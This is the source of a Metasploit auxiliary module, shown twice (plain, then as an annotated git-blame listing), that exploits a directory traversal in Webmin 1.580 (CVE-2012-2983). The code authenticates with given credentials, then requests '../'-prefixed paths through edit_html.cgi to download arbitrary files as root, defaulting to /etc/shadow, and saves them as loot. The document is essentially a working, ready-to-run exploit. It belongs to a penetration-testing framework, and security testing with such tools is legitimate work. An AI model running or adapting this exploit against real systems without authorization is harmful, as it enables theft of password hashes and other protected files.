modules/auxiliary/admin/webmin/edit_html_fileaccess.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'


class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
      'Description'    => %q{
          This module exploits a directory traversal in Webmin 1.580. The vulnerability
        exists in the edit_html.cgi component and allows an authenticated user with access
        to the File Manager Module to access arbitrary files with root privileges. The
        module has been tested successfully with Webim 1.580 over Ubuntu 10.04.
      },
      'Author'         => [
        'Unknown', # From American Information Security Group
        'juan vazquez' # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '85247'],
          ['BID', '55446'],
          ['CVE', '2012-2983'],
          ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
          ['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
        ],
      'DisclosureDate' => 'Sep 06 2012',
      'Actions'        =>
        [
          ['Download']
        ],
      'DefaultAction'  => 'Download'
      ))

    register_options(
      [
        Opt::RPORT(10000),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME',  [true, 'Webmin Username']),
        OptString.new('PASSWORD',  [true, 'Webmin Password']),
        OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
        OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
      ], self.class)
  end

  def run

    peer = "#{rhost}:#{rport}"

    print_status("Attempting to login...")

    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

    res = send_request_cgi(
      {
        'method'  => 'POST',
        'uri'     => "/session_login.cgi",
        'cookie'  => "testing=1",
        'data'    => data
      }, 25)

    if res and res.code == 302 and res.get_cookies =~ /sid/
      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
      if session and not session.empty?
        print_good "Authentication successful"
      else
        print_error "Authentication failed"
        return
      end
    else
      print_error "Authentication failed"
      return
    end

    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    traversal = "../" * datastore['DEPTH']
    traversal << datastore['RPATH']
    data = "file=#{traversal}&text=1"

    res = send_request_cgi(
      {
        'method'  => 'GET',
        'uri'     => "/file/edit_html.cgi?#{data}",
        'cookie'  => "sid=#{session}"
      }, 25)

    if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
      loot = $1
      f = ::File.basename(datastore['RPATH'])
      path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
      print_status("#{datastore['RPATH']} saved in #{path}")
    else
      print_error("Failed to retrieve the file")
      return
    end

  end

end
Unix linefeeds, not windows 2012-09-16 18:10:35 -05:00			`##`
Fix up comment splats with the correct URI 2014-10-17 11:47:33 -05:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Unix linefeeds, not windows 2012-09-16 18:10:35 -05:00			`##`

			`require 'msf/core'`


use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Unix linefeeds, not windows 2012-09-16 18:10:35 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',`
			`'Description' => %q{`
			`This module exploits a directory traversal in Webmin 1.580. The vulnerability`
			`exists in the edit_html.cgi component and allows an authenticated user with access`
			`to the File Manager Module to access arbitrary files with root privileges. The`
			`module has been tested successfully with Webim 1.580 over Ubuntu 10.04.`
			`},`
			`'Author' => [`
			`'Unknown', # From American Information Security Group`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '85247'],`
Retab modules 2013-08-30 16:28:54 -05:00			`['BID', '55446'],`
			`['CVE', '2012-2983'],`
			`['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],`
			`['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']`
			`],`
			`'DisclosureDate' => 'Sep 06 2012',`
			`'Actions' =>`
			`[`
			`['Download']`
			`],`
			`'DefaultAction' => 'Download'`
			`))`

			`register_options(`
			`[`
			`Opt::RPORT(10000),`
			`OptBool.new('SSL', [true, 'Use SSL', true]),`
			`OptString.new('USERNAME', [true, 'Webmin Username']),`
			`OptString.new('PASSWORD', [true, 'Webmin Password']),`
			`OptInt.new('DEPTH', [true, 'Traversal depth', 4]),`
			`OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])`
			`], self.class)`
			`end`

			`def run`

			`peer = "#{rhost}:#{rport}"`

Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Attempting to login...")`
Retab modules 2013-08-30 16:28:54 -05:00
			`data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"`

			`res = send_request_cgi(`
			`{`
			`'method' => 'POST',`
			`'uri' => "/session_login.cgi",`
			`'cookie' => "testing=1",`
			`'data' => data`
			`}, 25)`

Resolved some msftidy warnings (Set-Cookie) 2014-05-12 21:23:30 +02:00			`if res and res.code == 302 and res.get_cookies =~ /sid/`
			`session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] \|\| ''`
Retab modules 2013-08-30 16:28:54 -05:00			`if session and not session.empty?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_good "Authentication successful"`
Retab modules 2013-08-30 16:28:54 -05:00			`else`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error "Authentication failed"`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`
			`else`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error "Authentication failed"`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`

Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Attempting to retrieve #{datastore['RPATH']}...")`
Retab modules 2013-08-30 16:28:54 -05:00
			`traversal = "../" * datastore['DEPTH']`
			`traversal << datastore['RPATH']`
			`data = "file=#{traversal}&text=1"`

			`res = send_request_cgi(`
			`{`
			`'method' => 'GET',`
			`'uri' => "/file/edit_html.cgi?#{data}",`
			`'cookie' => "sid=#{session}"`
			`}, 25)`

			`if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)`
			`loot = $1`
			`f = ::File.basename(datastore['RPATH'])`
			`path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("#{datastore['RPATH']} saved in #{path}")`
Retab modules 2013-08-30 16:28:54 -05:00			`else`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error("Failed to retrieve the file")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`

			`end`
Unix linefeeds, not windows 2012-09-16 18:10:35 -05:00
			`end`